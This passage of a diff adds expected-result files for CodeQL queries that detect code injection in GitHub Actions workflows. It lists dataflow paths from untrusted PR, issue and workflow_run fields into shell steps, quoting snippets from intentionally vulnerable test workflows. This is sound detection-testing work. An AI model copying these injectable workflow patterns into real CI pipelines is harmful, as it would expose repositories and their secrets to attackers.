| .github/workflows/test16.yml:215:19:230:24 | needs.build-demo.outputs.commit-message | ${{ needs.build-demo.outputs.commit-message }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:26:15:33:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | .github/workflows/test16.yml:38:15:45:12 | Uses Step | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test16.yml:215:19:230:24 | needs.setup.outputs.ref | ${{ needs.setup.outputs.ref }} | .github/workflows/test16.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | .github/workflows/test17.yml:14:13:22:10 | Uses Step: get-pr | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:25:41:25:72 | steps.get-pr.outputs.data | ${{ steps.get-pr.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | .github/workflows/test17.yml:30:13:39:10 | Uses Step: get-pr-details | .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test17.yml:45:30:45:88 | fromJson(steps.get-pr-details.outputs.data).head.ref | ${{ fromJson(steps.get-pr-details.outputs.data).head.ref }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | .github/workflows/test17.yml:49:13:55:10 | Uses Step: issues | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:56:22:56:53 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | .github/workflows/test17.yml:60:13:68:10 | Uses Step: get-pull-request | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test17.yml:69:13:71:55 | fromJson(steps.get-pull-request.outputs.data).title | ${{ fromJson(steps.get-pull-request.outputs.data).title }} | .github/workflows/test17.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | .github/workflows/test18.yml:8:9:16:6 | Uses Step: issues | .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test18.yml:18:18:18:49 | steps.issues.outputs.data | ${{ steps.issues.outputs.data }} | .github/workflows/test18.yml:2:3:2:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:11:14:13:56 | HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName')\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:14:21:14:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | .github/workflows/test19.yml:16:14:18:50 | TITLE=$(gh pr view $PR_NUMBER --json title --jq .title)\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:19:21:19:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | .github/workflows/test19.yml:21:14:23:48 | BODY=$(gh pr view $PR_NUMBER --json body --jq .body)\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:24:21:24:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:26:14:28:56 | COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')"\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:29:21:29:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | .github/workflows/test19.yml:31:14:33:58 | CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')"\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:34:21:34:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | .github/workflows/test19.yml:36:14:38:52 | AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') \necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:39:21:39:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | .github/workflows/test19.yml:44:14:46:56 | HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' \| head -n 1)\necho "head_ref=$HEAD_REF" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:47:21:47:57 | steps.head_ref.outputs.head_ref | ${{ steps.head_ref.outputs.head_ref}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | .github/workflows/test19.yml:49:14:51:50 | TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:52:21:52:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | .github/workflows/test19.yml:54:14:56:48 | BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:57:21:57:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:59:14:61:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:62:21:62:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | .github/workflows/test19.yml:64:14:66:58 | CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename')\necho "files=$CHANGED_FILES" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:67:21:67:51 | steps.files.outputs.files | ${{ steps.files.outputs.files}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | .github/workflows/test19.yml:69:14:71:52 | AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login")\necho "author=$AUTHOR" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:72:21:72:53 | steps.author.outputs.author | ${{ steps.author.outputs.author}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | .github/workflows/test19.yml:77:14:79:50 | TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title')\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:80:21:80:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | .github/workflows/test19.yml:82:14:84:48 | BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body --jq '.body')\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:85:21:85:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:87:14:89:56 | COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:90:21:90:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | .github/workflows/test19.yml:95:14:97:50 | TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title")\necho "title=$TITLE" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:98:21:98:51 | steps.title.outputs.title | ${{ steps.title.outputs.title}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | .github/workflows/test19.yml:100:14:102:48 | BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body")\necho "body=$BODY" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test19.yml:103:21:103:49 | steps.body.outputs.body | ${{ steps.body.outputs.body}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | .github/workflows/test19.yml:105:14:107:56 | COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body')\necho "comments=$COMMENTS" >> "$GITHUB_OUTPUT"\n | .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test19.yml:108:21:108:57 | steps.comments.outputs.comments | ${{ steps.comments.outputs.comments}} | .github/workflows/test19.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | .github/workflows/test24.yml:8:9:17:6 | Uses Step: parse | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test24.yml:19:17:19:50 | steps.parse.outputs.payload | ${{ steps.parse.outputs.payload }} | .github/workflows/test24.yml:2:3:2:8 | issues | issues | +| .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:12:20:12:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test25.yml:9:9:12:6 | Uses Step: parse | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test25.yml:13:20:13:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test25.yml:3:5:3:10 | issues | issues | +| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test26.yml:28:20:28:50 | steps.parse.outputs.data | ${{ steps.parse.outputs.data }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | .github/workflows/test26.yml:20:11:20:140 | echo "body=$(gh issue view ${{ inputs.issue_number }} --repo ${{ github.repository }} --json body --jq '.body')" >> $GITHUB_OUTPUT | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test26.yml:29:20:29:58 | toJSON(steps.parse.outputs.data) | ${{ toJSON(steps.parse.outputs.data) }} | .github/workflows/test26.yml:4:3:4:19 | workflow_dispatch | workflow_dispatch | +| .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | .github/workflows/test27.yml:35:9:41:6 | Uses Step | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/test27.yml:52:17:52:56 | needs.setup.outputs.chart-version | ${{ needs.setup.outputs.chart-version }} | .github/workflows/test27.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:20:20:20:62 | github.event['pull_request']['body'] | .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/test.yml:52:20:52:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | .github/workflows/test.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | .github/workflows/untrusted_checkout1.yml:8:9:11:6 | Uses Step | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/untrusted_checkout1.yml:15:20:15:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/untrusted_checkout1.yml:2:3:2:21 | pull_request_target | pull_request_target | +| .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). 
| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | workflow_run | diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref new file mode 100644 index 000000000000..9af8ec0f9ab1 --- /dev/null +++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.qlref @@ -0,0 +1 @@ +Security/CWE-094/CodeInjectionCritical.ql 
diff --git a/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
new file mode 100644
index 000000000000..b341ac198536
--- /dev/null
+++ b/actions/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected
@@ -0,0 +1,708 @@ +edges +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:4:3:4:7 | input taint | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | provenance | | +| .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | .github/workflows/composite-action-caller-3.yml:9:9:13:6 | Uses Step: foo [result2] | provenance | | +| .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result] | provenance | | +| .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | .github/actions/action5/action.yml:9:3:14:46 | output Job outputs node [result2] | provenance | | +| .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | .github/actions/action5/action.yml:11:13:11:44 | steps.step.outputs.result | provenance | | +| .github/actions/action5/action.yml:23:15:23:33 | inputs.taint | .github/actions/action5/action.yml:20:7:26:4 | Run Step: step [result] | provenance | | +| .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | .github/actions/action5/action.yml:14:13:14:46 | steps.step2.outputs.result2 | provenance | | +| .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/actions/action5/action.yml:26:7:31:4 | Run Step: step2 [result2] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:4:3:4:7 | input title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | provenance | | +| 
.github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:14:3:16:45 | output Job outputs node [result] | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:16:13:16:45 | steps.out.outputs.replaced | provenance | | +| .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:27:19:27:37 | inputs.title | .github/actions/external/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:23:7:30:4 | Uses Step: out [replaced] | provenance | | +| .github/actions/external/ultralytics/actions/action.yaml:66:3:66:6 | input body | .github/actions/external/ultralytics/actions/action.yaml:96:16:96:33 | inputs.body | provenance | | +| .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | provenance | | +| .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | provenance | | +| .github/workflows/argus_case_study.yml:22:20:22:39 | env.ISSUE_TITLE | .github/workflows/argus_case_study.yml:15:9:24:6 | Uses Step: remove_quotations [replaced] | provenance | | +| .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:22:14:22:55 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\n | provenance | Config | +| .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | provenance | | +| .github/workflows/artifactpoisoning3.yml:43:14:51:45 | unzip input.zip\necho current directory 
contents\nls -al\n\necho Reading PR number\ntmp=$(> $GITHUB_OUTPUT\n | .github/workflows/artifactpoisoning3.yml:41:9:53:6 | Run Step: prepare [pr] | provenance | | +| .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:19:14:19:58 | echo "::set-output name=id::$(> $GITHUB_OUTPUT\necho "$fileList" >> $GITHUB_OUTPUT\necho "EOF" >> $GITHUB_OUTPUT\n\ngit push \\\n "https://oauth2:${BOT_PA_TOKEN}@github.com/${{ github.event.workflow_run.head_repository.full_name }}.git" \\\n 'HEAD:refs/heads/${{ github.event.workflow_run.head_branch }}'\n | .github/workflows/external/TestOrg/TestRepo/.github/workflows/publishResults.yml:59:7:88:4 | Run Step: git-commit [file-list] | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:6:7:6:11 | input taint | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | provenance | | +| .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/workflows/external/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | provenance | | +| .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | .github/workflows/image_link_generator.yml:25:25:25:68 | steps.extract-url.outputs.initial_url | provenance | | +| .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:15:9:22:6 | Run Step: extract-url [initial_url] | provenance | | +| .github/workflows/image_link_generator.yml:22:9:28:6 | Run Step: curl [redirected_url] | 
